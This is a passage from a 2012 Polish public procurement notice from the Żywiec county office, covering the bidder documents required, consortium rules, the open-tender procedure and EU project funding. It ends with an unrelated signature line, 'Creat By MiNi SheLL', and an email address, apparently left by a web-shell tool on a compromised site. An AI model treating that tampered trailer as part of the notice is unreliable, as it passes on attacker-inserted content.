<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3)	Pozostałe dokumenty, które Wykonawca jest zobowiązany złożyć wraz z ofertą:
a) Wypełniony Formularz ofertowy (zał. Nr 1 do Specyfikacji), zawierający m.in.: 
-	oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia wraz ze wszystkimi załącznikami i przyjęciu ich bez zastrzeżeń oraz o uznaniu się za związanymi określonymi w niej postanowieniami i zasadami postępowania, 
-	oświadczenie o przyjęciu:  terminu płatności i terminu związania ofertą 
b) W przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania wykonawców w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
c)	Pełnomocnictwo udzielane osobom podpisującym dokumenty ofertowe, o ile prawo do reprezentowania wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych - postanowienie niniejsze stosuje się odpowiednio do reprezentowania wykonawcy powołanego i funkcjonującego na podstawie przepisów ustaw.
4)	Dokumenty, o których mowa wyżej, należy przedłożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę lub osobę upoważnioną do składania oświadczeń woli w imieniu wykonawcy, z tym że pełnomocnictwo udzielone osobie reprezentującej wykonawcę składane przez Wykonawcę powinno być złożone w oryginale lub kserokopii poświadczonej notarialnie.
5)	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (konsorcjum, spółka cywilna) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być udzielone przez wszystkich wykonawców wchodzących w skład  konsorcjum oraz zostać przedłożone w oryginale lub kserokopii poświadczonej notarialnie.
6)	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z §4 Rozporządzenie Prezesa Rady Ministrów z dnia 30.12.2009r. ( Dz. U. 2009r. Nr 226 poz. 1817) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane.
7)	W przypadku, gdy złożona przez wykonawcę kopia dokumentu będzie nieczytelna lub będzie budzić wątpliwości co do jej prawdziwości, zamawiający może zażądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu.
8)	Dokumenty i oświadczenia sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski.
9)	W wypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum, spółka cywilna) dokumenty, o których mowa w pkt. V SIWZ ppkt. 2 a - d) winny zostać przedłożone odrębnie w odniesieniu do każdego z wykonawców.
10)	Wykonawcy ubiegający się o udzielenie zamówienia w ramach spółki cywilnej dokumenty, o których mowa w pkt. V SIWZ ppkt. 2 c) i d)  winny zostać przedłożone odrębnie w odniesieniu do spółki cywilnej oraz odrębnie w odniesieniu do jej wspólników.
11)	W przypadku wykonawców wspólnie ubiegających się o zamówienie (konsorcjum, spółka cywilna), warunki wynikające z art. 22 ust. 1 pkt 1 ustawy muszą być spełnione oddzielnie przez każdego z wykonawców składających ofertę, natomiast warunki wynikające z art. 22 ust. 1 pkt 2 - 4 (warunki materialne lub warunki potwierdzające zdolność wykonawcy do wykonania przedmiotowego zamówienia) mogą być spełnione łącznie przez wszystkich wykonawców ubiegających się o udzielenie zamówienia. Złożone przez Wykonawców ubiegających się o zamówienie oświadczenia, o których mowa wyżej powinny potwierdzać spełnianie warunków wynikających z art. 22 ust. 1 pkt 1 - 4 Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starostwo.zywiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Żywcu, 34-300 Żywiec przy ul. Leśnianka 102 II piętro pok. nr. 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2012 godzina 08:00, miejsce: Starostwo Powiatowe w Żywcu, 34-300 Żywiec, ul. Krasińskiego 13, parter Biuro Informacji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest realizowany  w ramach projektu pt. Mam zawód - mam pracę w regionie  w ramach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013 przez Samorząd Województwa Śląskiego we współpracy ze Śląskim Kuratorem Oświaty oraz powiatami i miastami na prawach powiatu z terenu województwa śląskiego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com